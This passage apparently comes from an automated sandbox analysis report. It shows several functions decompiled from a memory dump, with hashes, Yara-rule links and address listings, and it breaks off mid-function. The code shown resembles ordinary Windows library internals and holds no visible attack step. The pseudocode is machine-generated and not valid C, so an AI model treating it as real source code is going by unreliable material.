                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9586f62463285d512ce3cf8f27fb123039a29663219a46cff541454e5b810d3
                                                                  • Instruction ID: 9449be8e35b73f05ec72b9d6bd08faa31bd99c4dbc4f0972c225ffbea0095fbf
                                                                  • Opcode Fuzzy Hash: d9586f62463285d512ce3cf8f27fb123039a29663219a46cff541454e5b810d3
                                                                  • Instruction Fuzzy Hash: 2171FF72240701AFE731CF24D842F66B7E9EB80724F20493CE656876A0EB75FA40CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B6DC9, Relevance: .2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 79%
                                                                  			E049B6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E049B6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04957D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04979AE0();
					_t87 = L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E049B795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E049B795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E049B795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E049B795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04954620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E049B6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E049B6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E049B6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E049B6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04957D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04979AE0();
								L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04952400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04952400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04952400( &_v52);
							}
							if(_v28 >= 0) {
								return L04952400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                  0x049b6dd4
                                                                  0x049b6dde
                                                                  0x049b6de1
                                                                  0x049b6de3
                                                                  0x049b6de6
                                                                  0x049b6de9
                                                                  0x049b6dec
                                                                  0x049b6def
                                                                  0x049b6df2
                                                                  0x049b6df5
                                                                  0x049b6dfe
                                                                  0x049b6e04
                                                                  0x049b6e09
                                                                  0x049b6e0d
                                                                  0x049b6e18
                                                                  0x049b6e1b
                                                                  0x049b6e22
                                                                  0x049b6e2d
                                                                  0x049b6e30
                                                                  0x049b6e36
                                                                  0x049b6e42
                                                                  0x049b6e4d
                                                                  0x049b6e50
                                                                  0x049b6e55
                                                                  0x049b6e5c
                                                                  0x049b6e6e
                                                                  0x049b6e5e
                                                                  0x049b6e67
                                                                  0x049b6e67
                                                                  0x049b6e73
                                                                  0x049b6e74
                                                                  0x049b6e77
                                                                  0x049b6e7c
                                                                  0x049b6e7d
                                                                  0x049b6e8e
                                                                  0x049b6e93
                                                                  0x049b6e9c
                                                                  0x049b6ea8
                                                                  0x049b6eab
                                                                  0x049b6eac
                                                                  0x049b6eb3
                                                                  0x049b6ecd
                                                                  0x049b6edc
                                                                  0x049b6ee2
                                                                  0x049b6ee5
                                                                  0x049b6ef2
                                                                  0x049b6efb
                                                                  0x049b6f01
                                                                  0x049b6f06
                                                                  0x049b6f0b
                                                                  0x049b6f11
                                                                  0x049b6f1a
                                                                  0x049b6f22
                                                                  0x049b6f26
                                                                  0x049b6f26
                                                                  0x049b6f33
                                                                  0x049b6f41
                                                                  0x049b6f44
                                                                  0x049b6f47
                                                                  0x049b6f54
                                                                  0x049b6f65
                                                                  0x049b6f77
                                                                  0x049b6f7c
                                                                  0x049b6f82
                                                                  0x049b6f91
                                                                  0x049b6f99
                                                                  0x049b6fa3
                                                                  0x049b6fae
                                                                  0x049b6fae
                                                                  0x049b6fba
                                                                  0x049b6fbb
                                                                  0x049b6fbc
                                                                  0x049b6fc1
                                                                  0x049b6fc2
                                                                  0x049b6fd3
                                                                  0x049b6fd8
                                                                  0x049b6fd8
                                                                  0x049b6fdf
                                                                  0x049b6fe8
                                                                  0x049b6fee
                                                                  0x049b6fee
                                                                  0x049b6ff5
                                                                  0x049b6ffb
                                                                  0x049b6ffb
                                                                  0x049b7004
                                                                  0x00000000
                                                                  0x049b700a
                                                                  0x049b7004
                                                                  0x049b6eb3
                                                                  0x049b6e9c
                                                                  0x049b7015

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                  • Instruction ID: 786d4e0374dce6a709ff696ca9499cce48fe38e734c1b1c6fbf2cb48030b8415
                                                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                  • Instruction Fuzzy Hash: E7716C71A00619AFDB10DFA4CA84EEEBBB9FF88714F104579E945A7250DB30BA41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049352A5, Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 80%
                                                                  			E049352A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0494EEF0(0x4a279a0);
					_t104 =  *0x4a28210; // 0x291cc0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0494EB70(_t93, 0x4a279a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04979890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0494EEF0(0x4a279a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0494EB70(0, 0x4a279a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x291cd802
								_t13 = _t104 + 0xc; // 0x291ccd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0496F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0494EEF0(0x4a279a0);
									__eflags =  *0x4a28210 - _t104; // 0x291cc0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4a28210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000291c
											_t95 =  *((intOrPtr*)( *_t37));
											E049B4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0494EB70(_t95, 0x4a279a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E049795D0();
											L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E049795D0();
											L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0494EB70(_t93, 0x4a279a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E049795D0();
										L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E049795D0();
										L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000291c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x291cd802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0496F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                  0x049352a5
                                                                  0x049352ad
                                                                  0x049352b0
                                                                  0x049352b3
                                                                  0x049352b7
                                                                  0x049352ba
                                                                  0x049352bf
                                                                  0x049352c4
                                                                  0x049352cc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049352ce
                                                                  0x049352d1
                                                                  0x049352d9
                                                                  0x049352dd
                                                                  0x049352e7
                                                                  0x049352f7
                                                                  0x049352f9
                                                                  0x049352fd
                                                                  0x04990dcf
                                                                  0x04990dd5
                                                                  0x04990dd6
                                                                  0x04990dd7
                                                                  0x04990dd8
                                                                  0x04990dd9
                                                                  0x04990dde
                                                                  0x04990ddf
                                                                  0x04990de0
                                                                  0x04990de1
                                                                  0x04990de2
                                                                  0x04990de2
                                                                  0x04990de5
                                                                  0x04990dea
                                                                  0x04990dec
                                                                  0x04990f60
                                                                  0x04990f64
                                                                  0x04990f70
                                                                  0x04990f76
                                                                  0x04990f79
                                                                  0x04990f79
                                                                  0x00000000
                                                                  0x04990f64
                                                                  0x04990df2
                                                                  0x04990df7
                                                                  0x04990e04
                                                                  0x04990e04
                                                                  0x04990e0d
                                                                  0x04990e0d
                                                                  0x04990e10
                                                                  0x04990e1a
                                                                  0x04990e1c
                                                                  0x04990e4c
                                                                  0x04990e52
                                                                  0x04990e61
                                                                  0x04990e67
                                                                  0x04990e6b
                                                                  0x04990e70
                                                                  0x04990e76
                                                                  0x04990ed7
                                                                  0x04990edc
                                                                  0x04990ee0
                                                                  0x04990ee6
                                                                  0x04990eea
                                                                  0x04990eed
                                                                  0x04990ef0
                                                                  0x04990ef3
                                                                  0x04990ef6
                                                                  0x04990ef9
                                                                  0x04990efb
                                                                  0x04990efe
                                                                  0x04990f01
                                                                  0x04990f01
                                                                  0x04990f0b
                                                                  0x04990f12
                                                                  0x04990f16
                                                                  0x04990f18
                                                                  0x04990f18
                                                                  0x04990f1b
                                                                  0x04990f2c
                                                                  0x04990f31
                                                                  0x04990f31
                                                                  0x04990f35
                                                                  0x04990f39
                                                                  0x04990f3a
                                                                  0x04990f3c
                                                                  0x04990f3c
                                                                  0x04990f3f
                                                                  0x04990f50
                                                                  0x04990f55
                                                                  0x04990f55
                                                                  0x04990f59
                                                                  0x049352eb
                                                                  0x049352f1
                                                                  0x049352f1
                                                                  0x04990e7d
                                                                  0x04990e84
                                                                  0x04990e88
                                                                  0x04990e8a
                                                                  0x04990e8a
                                                                  0x04990e8d
                                                                  0x04990e9e
                                                                  0x04990ea3
                                                                  0x04990ea3
                                                                  0x04990ea7
                                                                  0x04990eaf
                                                                  0x04990eb3
                                                                  0x04990eb9
                                                                  0x04990eb9
                                                                  0x04990ebc
                                                                  0x04990ecd
                                                                  0x04990ecd
                                                                  0x00000000
                                                                  0x04990eb3
                                                                  0x04990e1e
                                                                  0x04990e21
                                                                  0x04990e25
                                                                  0x04990e2b
                                                                  0x04990e2f
                                                                  0x04990e30
                                                                  0x04990e3a
                                                                  0x04990e3f
                                                                  0x04990e41
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04990e47
                                                                  0x00000000
                                                                  0x04990e47
                                                                  0x04990df9
                                                                  0x04990dfe
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04990dfe
                                                                  0x04935303
                                                                  0x04935307
                                                                  0x00000000
                                                                  0x04935309
                                                                  0x00000000
                                                                  0x04935309
                                                                  0x04935307
                                                                  0x049352e9
                                                                  0x049352e9
                                                                  0x00000000
                                                                  0x049352e9
                                                                  0x0493530e
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c346e5d52ceb6cbb6ad85a5308d61cc11c09ae4923aac94a6b62a60fa3d1cb27
                                                                  • Instruction ID: faa93e0d958f3e6d7a363f21b170c5a56e1975bca63b5607017f03817a9fbaa1
                                                                  • Opcode Fuzzy Hash: c346e5d52ceb6cbb6ad85a5308d61cc11c09ae4923aac94a6b62a60fa3d1cb27
                                                                  • Instruction Fuzzy Hash: 8951DE71205742AFEB20DF68C940B27BBE8FF88714F14492EE8A587651E774F940CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04962AE4, Relevance: .2, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E04962AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4a28204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4a28208; // 0x4a28207
				_t8 = _t57 + 0x4a28208; // 0x4a28207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4a28450; // 0x293c80
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4a2821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4a26d5c; // 0x7fb80654
							_t72 =  *0x4a26d5c; // 0x7fb80654
							_t75 =  *0x4a26d5c; // 0x7fb80654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4a26d5c; // 0x7fb80654
							_t84 =  *0x4a26d5c; // 0x7fb80654
							_t87 =  *0x4a26d5c; // 0x7fb80654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0497F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                  0x04962ae4
                                                                  0x04962aec
                                                                  0x04962aef
                                                                  0x04962af4
                                                                  0x04962af7
                                                                  0x04962afd
                                                                  0x04962b92
                                                                  0x04962b92
                                                                  0x04962b97
                                                                  0x04962b9c
                                                                  0x04962b9c
                                                                  0x04962b03
                                                                  0x04962b06
                                                                  0x04962b09
                                                                  0x04962b09
                                                                  0x04962b0f
                                                                  0x04962b15
                                                                  0x04962b15
                                                                  0x04962b1b
                                                                  0x04962b1e
                                                                  0x04962b21
                                                                  0x04962b26
                                                                  0x04962b29
                                                                  0x04962b81
                                                                  0x04962b84
                                                                  0x04962c0e
                                                                  0x04962c15
                                                                  0x04962c24
                                                                  0x04962c24
                                                                  0x04962b8a
                                                                  0x04962b8a
                                                                  0x04962b8a
                                                                  0x04962b8a
                                                                  0x04962b90
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962b4a
                                                                  0x04962b4a
                                                                  0x04962b4d
                                                                  0x04962b53
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962b55
                                                                  0x04962b58
                                                                  0x04962bb7
                                                                  0x049a5d1b
                                                                  0x049a5d37
                                                                  0x049a5d47
                                                                  0x049a5d53
                                                                  0x04962bbd
                                                                  0x04962bbd
                                                                  0x04962bbd
                                                                  0x04962bb7
                                                                  0x04962b5d
                                                                  0x04962c2f
                                                                  0x049a5d5b
                                                                  0x049a5d77
                                                                  0x049a5d87
                                                                  0x049a5d93
                                                                  0x04962c35
                                                                  0x04962c35
                                                                  0x04962c35
                                                                  0x04962c2f
                                                                  0x04962b65
                                                                  0x04962b9f
                                                                  0x04962ba2
                                                                  0x04962b67
                                                                  0x04962b67
                                                                  0x04962b69
                                                                  0x04962b6b
                                                                  0x04962b6e
                                                                  0x04962bc9
                                                                  0x04962bcc
                                                                  0x04962bcf
                                                                  0x04962bd4
                                                                  0x04962bd6
                                                                  0x04962bd6
                                                                  0x04962bdb
                                                                  0x04962c02
                                                                  0x04962c05
                                                                  0x04962c07
                                                                  0x00000000
                                                                  0x04962c07
                                                                  0x04962be0
                                                                  0x04962c00
                                                                  0x04962c3f
                                                                  0x04962c3f
                                                                  0x00000000
                                                                  0x04962c00
                                                                  0x04962be5
                                                                  0x04962be7
                                                                  0x04962bec
                                                                  0x04962bf4
                                                                  0x04962bf6
                                                                  0x00000000
                                                                  0x04962bf6
                                                                  0x04962b70
                                                                  0x04962b76
                                                                  0x04962b2b
                                                                  0x04962b2b
                                                                  0x04962b2d
                                                                  0x04962b2f
                                                                  0x04962b32
                                                                  0x04962b35
                                                                  0x04962b3a
                                                                  0x00000000
                                                                  0x04962b40
                                                                  0x04962b43
                                                                  0x04962b45
                                                                  0x04962b47
                                                                  0x04962b4a
                                                                  0x04962b4d
                                                                  0x04962b53
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962b53
                                                                  0x04962b78
                                                                  0x04962b78
                                                                  0x04962b7b
                                                                  0x04962b7e
                                                                  0x00000000
                                                                  0x04962b7e
                                                                  0x04962b76
                                                                  0x04962ba5
                                                                  0x04962ba5
                                                                  0x04962ba8
                                                                  0x04962bad
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962baf
                                                                  0x04962baf
                                                                  0x04962bc2
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a64101b0ea980c6a9e52fdd9be4db686923b9d81aba8f78320f74320ad9848cc
                                                                  • Instruction ID: fc73b80dd4c26edddef3bb621460c021f757c6ceda088cb51c4a95a76f164179
                                                                  • Opcode Fuzzy Hash: a64101b0ea980c6a9e52fdd9be4db686923b9d81aba8f78320f74320ad9848cc
                                                                  • Instruction Fuzzy Hash: 0F51D276B00115CFCB14EF2CC9809BDB7B6FB8970071589AAE856AB314E734BE51DB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0495DBE9, Relevance: .1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 86%
                                                                  			E0495DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0493CC50(E04934510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04957D50() != 0) {
